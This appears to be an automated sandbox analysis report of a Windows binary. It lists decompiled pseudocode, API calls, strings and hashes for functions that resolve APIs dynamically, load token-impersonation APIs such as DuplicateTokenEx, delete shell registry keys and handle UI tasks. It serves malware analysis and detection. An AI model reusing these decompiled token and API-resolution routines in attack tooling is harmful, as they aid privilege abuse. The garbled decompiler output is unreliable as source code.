Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

kernel32.dll, xrefs: 00409C8B
ntdll.dll, xrefs: 00409CB3
LdrGetProcedureAddress, xrefs: 00409CBA
GetProcAddress, xrefs: 00409C98, 00409C9D

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

DuplicateTokenEx, xrefs: 004028DB
advapi32.dll, xrefs: 004028A6
CreateProcessWithLogonW, xrefs: 004028B7
CreateProcessWithTokenW, xrefs: 004028C2
OpenProcessToken, xrefs: 004028CF

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s, xrefs: 00404631
%s\shell\%s\command, xrefs: 00404618

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

Error: Cannot load the common control classes., xrefs: 004031A7
Error, xrefs: 004031A2
comctl32.dll, xrefs: 00403145
InitCommonControlsEx, xrefs: 00403168

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

TranslatorURL, xrefs: 0040640B
TranslatorName, xrefs: 004063F7
rtl, xrefs: 004063CD
general, xrefs: 004063B7
charset, xrefs: 004063E1

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

", xrefs: 0040AE22
<br>, xrefs: 0040AE68
>, xrefs: 0040AE13
<, xrefs: 0040AE05
°, xrefs: 0040AE3F
&, xrefs: 0040AE4E

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
